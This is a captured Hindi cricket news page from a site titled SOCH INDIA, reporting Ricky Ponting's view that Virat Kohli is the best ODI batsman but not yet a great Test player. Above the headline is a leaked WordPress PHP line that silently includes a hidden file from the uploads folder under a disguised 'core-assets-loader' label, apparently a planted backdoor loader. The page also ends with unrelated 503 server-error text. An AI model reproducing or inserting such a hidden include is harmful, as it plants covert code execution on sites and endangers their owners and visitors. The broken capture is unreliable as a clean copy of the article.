add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); कोहली को वनडे में बेस्ट बताते हुए पॉन्टिंग ने कहा,’टेस्ट में ‘बेस्ट’ कहना अभी जल्दबाज़ी’ – SOCH INDIA
Menu

खेल
कोहली को वनडे में बेस्ट बताते हुए पॉन्टिंग ने कहा,’टेस्ट में ‘बेस्ट’ कहना अभी जल्दबाज़ी’

nobanner

महान बल्लेबाज रिकी पोंटिंग का मानना है कि भारतीय कप्तान विराट कोहली इस समय दुनिया का नंबर एक वनडे बल्लेबाज है लेकिन अभी उसे टेस्ट क्रिकेट में महान नहीं कहा जा सकता.

पोंटिंग ने ‘सिडनी मार्निंग हेराल्ड’ से कहा,‘‘क्या वह दुनिया का सर्वश्रेष्ठ बल्लेबाज है. हां, वह है. वह छह-सात महीने पहले ही था और वहां से उसने नये मानदंड कायम कर दिये हैं.’’ कोहली की कप्तानी में भारत ने वेस्टइंडीज, न्यूजीलैंड और इंग्लैंड को टेस्ट श्रृंखलाओं में हराया. अब वह वनडे टीम के भी कप्तान हैं.

पोंटिंग ने कहा कि तीनों प्रारूपों में कप्तानी से कोहली और निखरेंगे.

उन्होंने कहा,‘‘अभी उसे सर्वश्रेष्ठ कहना जल्दबाजी होगी. यह कह सकते हैं कि वनडे क्रिकेट में वह सर्वश्रेष्ठ हैं. उसका वनडे रिकार्ड बेहतरीन है लेकिन टेस्ट के लिये अभी उसे थोड़ा समय और देना होगा.’’ उन्होंने कहा,‘‘टेस्ट क्रिकेट में अभी उसे महान नहीं कहा जा सकता. महान खिलाड़ी तेंदुलकर, लारा, कैलिस जैसे होते हैं जो 120, 130 या 200 टेस्ट खेल चुके हैं. विराट तो अभी आधे भी नहीं खेला.’’

आस्ट्रेलियाई टीम के भारत दौरे के बारे में पोंटिंग ने कहा कि आस्ट्रेलिया को भारतीय टीम पर दबाव बनाने के लिये कोहली पर अंकुश लगाना होगा. उन्होंने कहा,‘‘विराट कोहली के बारे में यह अहम बात है कि कोई भी तनाव होने पर वह अपने कम्फर्ट जोन से थोड़ा बाहर आ जाता है. वह काफी आक्रामक हो जाता है जो उसके लिये भी अच्छा हो सकता है और विरोधी टीम के लिये भी.’’

उन्होंने कहा,‘‘देखते हैं कि क्या होता है. वह काफी जज़्बाती है और आक्रामक भी. भारत में खेलने से मैने तो यह ही सीखा है कि मेजबान को लय बनाने से रोकना जरूरी है.’’

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.